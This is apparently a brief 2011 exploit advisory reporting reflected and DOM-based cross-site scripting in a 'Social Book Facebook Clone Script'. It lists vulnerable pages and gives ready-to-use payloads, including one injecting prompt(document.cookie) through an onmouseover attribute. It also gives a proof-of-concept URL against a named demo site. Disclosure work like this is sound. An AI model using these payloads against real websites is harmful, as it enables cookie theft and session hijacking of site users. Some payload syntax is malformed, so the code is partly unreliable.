# Exploit Title: Social Book Facebook Clone Script Reflected XSS Vulnerability # Date: 2011 # Author: Eyup CELIK # Version: All Version # Tested on: All versions are Vulnerability # Web Site: www.eyupcelik.com.tr ISSUE XSS can be done using the command input Vulnerable Page: signup.php lostpass.php login.php index.php help_tos.php help_contact.php help.php Example: index.php"onmouseover=prompt(XSS CODE and DOM CODE)> Exploit: Reflected XSS: index.php/"onmouseover=prompt(document.cookie)> DOM Based XSS: index.php/"onmouseover=prompt('window.location(http://google.com)')> POC: http://www.clonescriptsoftwaredemos.com/facebook/index.php/%22onmouseover=prompt('window.location(http://google.com)')%3E Thanks, Eyup CELIK Information Technology Security Specialist http://www.eyupcelik.com.tr